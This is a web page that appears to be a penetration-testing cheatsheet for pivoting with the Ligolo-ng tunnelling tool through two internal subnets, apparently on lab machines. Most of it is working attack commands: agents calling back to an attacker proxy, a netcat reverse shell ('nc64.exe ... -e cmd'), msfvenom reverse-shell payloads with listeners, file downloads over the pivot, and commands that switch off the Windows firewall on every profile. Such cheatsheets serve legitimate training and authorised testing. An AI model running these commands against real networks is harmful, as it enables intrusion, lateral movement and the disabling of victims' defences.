https://ph03n1x.net/ligolo-cheatsheet/

Local Port Forwarding to your Kali

When you find a website that's accessible only from the target or a service that runs only on the target machine, then you need to perform local port forwarding. You don't need proxychains

# On your Kali terminal, create a new network called 'ligolo'
# It requires sudo rights
sudo ip tuntap add user <user> mode tun ligolo
sudo ip link set ligolo up
# when you need to delete it
sudo ip link del ligolo 

# Run proxy in your kali
.\\proxy -selfcert 

# connect agent to your proxy
.\\agent.exe -connect $ip:port -ignore-cert

# select an agent session in proxy UI
session

# in proxy, select the new connection and attach it to ligolo
start --tun ligolo

# Add the magic route to access all internal ports locally on kali
sudo ip route add 240.0.0.1/32 dev ligolo

Example - Set up with your config

# tun0 I (Kali VPN)
192.168.1.10

# 1st machine external IP
192.168.1.13

# 1st machine internal IP
10.10.10.10

# 2nd machine external IP
10.10.10.13

# 2nd machine internal IP
11.11.11.11

First pivot on First internal range

# 1. Create and bring up tunnel1 (Kali Terminal)
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

# 2. Start ligolo proxy server on kali with sudo
sudo ./proxy -selfcert

# 3. Upload agent and connect back to proxy
.\\agent.exe -connect 192.168.45.176:11601 -ignore-cert # windows
./agent -connect 192.168.45.176:11601 -ignore-cert # linux

# in proxy, select agent session
session

# 4. Start the tunnel
start --tun ligolo 
# or just simply
start

# 5. Add route to the target subnet
sudo ip route add 10.10.10.0/24 dev ligolo

# 6. listener on tunnel1
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# 7. Test reachabaility
nxc smb 10.10.10.0/24

Second Pivot on Second internal range

# 1. Create and bring up tunnel2 (Kali Terminal)
sudo ip tuntap add user <user> mode tun tunnel2
sudo ip link set tunnel2 up

# 2. Connect new agent (from 2nd target) to 1st target internal IP
.\\agent.exe -connect 10.10.10.10:11601 -ignore-cert

# 3. select new agent session in proxy
# make sure you are on the right connection
start --tun tunnel2

# 4. Add route to 2nd internal subnet
sudo ip route add 11.11.11.0/24 dev tunnel2

# 5. Add listeners for whitelisted ports
listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443 --tcp
listener_add --addr 0.0.0.0:80 --to 127.0.0.1:80 --tcp

# 6. Download from 2nd target using 1st internal
wget <http://10.10.10.10/wook> -outfile wook

# 7. Catch reverse shell from 2nd target on your kali IP
nc64.exe 10.10.10.10 443 -e cmd

# 8. Test reachability on 2nd subnet
nxc smb 11.11.11.0/24

Reverse Shell

# Create a reverse shell file
# Remember to use MS01's IP, not the Attacker's IP
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$AGENT_IP LPORT=80 -f exe -o shell.exe

# Create a listener for file transfer in ligolo proxy
listener_add --addr 0.0.0.0:2222 --to 127.0.0.1:3333 --tcp

# Transfer the reverse shell payload to agent shell

# Transfer the reverse shell payload from agent shell to target shell

# Prepare listener in Kali
rlwrap nc -lvnp 3333

More Info about Reverse shell

<aside>

What if I want a reverse shell back from MS02 to my kali?

• in some cases, you may want to get a reverse shell back to kali. But you cant just run a msfvenom payload on MS02 with the LHOST being 192.168.1.10 because MS02 has no idea where the 192.68.1.0/24 subnet is and as such your rev shell will fail
• But MS02 knows where MS01 is. So the idea is to have MS01 port fwd incoming connections from MS02 to the kali machine!
• Now assuming you set up the tunnel, what you need to do is to add a listener on the MS01 agent. On your proxy, do the following:

[Agent : corp.com\\wook@MS01] » listener_add --addr 0.0.0.0:443 --to 0.0.0.0:443 --tcp

• what the above does is tell the agent MS01 to forward any traffic they receive from port 443 and push it out the other side on port 443. This works bidrectional btw.
• Ports that are already hosting a service cannot be used (eg. there is a HTTP server up on the target at port 80, which means you cannot bind 0.0.0.0:80). This goes the same for your own services (eg. SMB server on Kali's port 445, which prevents you from binding a listener on 127.0.0.1:445)
• You can add listeners and routes while the session has started, so don't worry if you did not execute this part in order
• with this you can get a reverse shell by getting MS02 to connect to MS01 on port 443 who will then forward the traffic to kali on port 443 so:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.1.20 LPORT=443 -f exe > rev.exe

# set up listener on kali

rlwrap nc -lvnp 443

# upload this file to MS02 and execute it. You should get a rev shell!

• Again why port 443 is chosen is due to likely firewall rules exempting port 443 from outbound traffic. That said, if you can get Admin on MS01 you can just disable the firewall and use any ports you like for forwarding on MS01. You can do this on MS01 with the following command:

netsh advfirewall set allprofiles state off
#powershell equivalent
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

</aside>